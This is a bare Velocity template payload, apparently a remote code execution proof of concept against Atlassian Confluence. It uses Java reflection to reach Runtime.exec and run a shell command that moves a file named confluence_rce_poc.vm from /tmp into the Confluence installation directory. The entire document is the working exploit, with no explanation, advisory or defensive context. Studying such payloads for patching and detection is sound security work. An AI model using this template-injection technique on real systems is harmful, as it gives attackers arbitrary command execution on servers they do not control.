#set($e="e")
$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("mv /tmp/confluence_rce_poc.vm /usr/local/atlassian/confluence/confluence",null,null).toString();
